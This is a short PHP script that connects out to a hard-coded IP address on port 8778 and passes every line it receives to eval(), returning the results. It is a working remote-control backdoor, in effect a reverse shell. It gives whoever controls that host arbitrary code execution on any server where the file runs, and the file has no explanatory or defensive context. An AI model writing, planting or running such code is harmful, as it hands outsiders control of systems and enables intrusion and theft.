<?php

$port = 8778;
$host = '34.64.51.26';

function s_write($s, $data) {
    socket_write($s, $data, strlen($data));
}

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die();
$result = socket_connect($socket, $host, $port) or die();

s_write($socket, "OK\n");

do {
    if (false === ($buf = socket_read($socket, 2048, PHP_NORMAL_READ))) {
        echo "socket_read() failed: reason: " . socket_strerror(socket_last_error($socket)) . "\n";
        break;
    }
    if (!$buf = trim($buf)) {
        continue;
    }
    if ($buf == 'quit') {
        break;
    }

    $ret = eval('return ' . $buf);

    s_write($socket, $ret . "\n");
    echo "$buf\n";

} while (true);

socket_close($socket);
